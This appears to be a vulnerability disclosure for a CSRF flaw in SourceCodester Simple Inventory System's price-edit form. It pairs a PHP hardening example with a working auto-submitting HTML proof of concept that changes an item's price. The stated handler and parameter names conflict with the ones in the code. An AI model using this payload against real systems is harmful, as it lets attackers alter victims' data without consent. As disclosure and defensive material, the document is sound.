SourceCodester Simple Inventory System CSRF.md

File metadata and controls

44 lines (30 loc) · 1.97 KB

CSRF vulnerability in SourceCodester Simple Inventory System

official website: https://www.sourcecodester.com/php/4481/simple-inventory-system-using-phpmysql.html

version: v1.0

route: /tableedit.php#page=editprice

injection parameter: $_POST['itemnumber']

1. Vulnerability analysis

As shown in the screenshots below, the price-edit form in tableedit.php submits the modified price to the back end with no anti-CSRF token, and the handler (updateproduct.php) takes the posted values straight into the SQL UPDATE statement. The only thing tying the request to the user is the session cookie, which the browser attaches automatically, so any page the victim visits can submit that form on their behalf: an attacker who gets a logged-in user to open a crafted page can change product data without the user's knowledge.

image-20240517163532892

image-20240517163554229
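The following is an added example of how the price-update flow could be hardened; it is not code from the Simple Inventory System. A per-session synchronizer token is embedded in the form and checked on the back end, the session cookie is marked SameSite, and the UPDATE uses a prepared statement so the posted values never reach the SQL text. The field names ITEM and itemprice are those used by the application; the table name `products`, the column names, the `$pdo` connection, and the `csrf_token` field name are assumptions.

```php
<?php
// Added example, not the project's own code. Assumed: the application already
// keeps a login session, $pdo is a PDO connection to its database, and the
// table is `products` with columns `ITEM` and `itemprice`.

// Defence in depth: a SameSite=Lax session cookie is not sent on cross-site
// POSTs, so a CSRF page cannot ride the session even if a token check is missed.
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

// --- tableedit.php side: issue one random token per session and embed it ---
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function render_price_form(int $item, float $price): string {
    $token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    return <<<HTML
<form action="updateprice.php" method="POST">
  <input type="hidden" name="csrf_token" value="$token">
  <input type="hidden" name="ITEM" value="$item">
  <input type="number" step="0.01" name="itemprice" value="$price">
  <input type="submit" value="Update price">
</form>
HTML;
}

// --- updateprice.php side: refuse any request without the session's token ---
function csrf_check(): void {
    $sent     = $_POST['csrf_token'] ?? '';
    $expected = $_SESSION['csrf_token'] ?? '';
    // hash_equals is constant-time, so the comparison does not leak the token.
    if ($expected === '' || !is_string($sent) || !hash_equals($expected, $sent)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
}

function update_price(PDO $pdo): void {
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        http_response_code(405);
        exit('POST required');
    }
    csrf_check();

    // Validate the two fields the form actually carries.
    $item  = filter_input(INPUT_POST, 'ITEM', FILTER_VALIDATE_INT);
    $price = filter_input(INPUT_POST, 'itemprice', FILTER_VALIDATE_FLOAT);
    if ($item === null || $item === false || $price === null || $price === false || $price < 0) {
        http_response_code(400);
        exit('Bad input');
    }

    // Prepared statement: values are bound, never concatenated into the query.
    $stmt = $pdo->prepare('UPDATE products SET itemprice = :price WHERE ITEM = :item');
    $stmt->execute([':price' => $price, ':item' => $item]);
}
```

Against this handler the attacker's page fails with 403: it cannot read the victim's token out of the session, and a cross-site POST does not carry a Lax cookie, so the request never reaches the UPDATE.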

2. Vulnerability verification and exploit

The PoC is as follows. Save it as an HTML file and get the victim to open it in a browser where they are logged in to the application; the form auto-submits and the product price is modified. Note that the PoC only works if the victim's browser attaches the session cookie to the cross-site POST; browsers that default to SameSite=Lax may withhold it.

```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://10.15.6.184:82/updateprice.php" method="POST">
      <input type="hidden" name="ITEM" value="1" />
      <input type="hidden" name="itemprice" value="888" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```

image-20240517164018816

After the victim opens the HTML file, the price of item 1 is changed to 888.

image-20240517164148946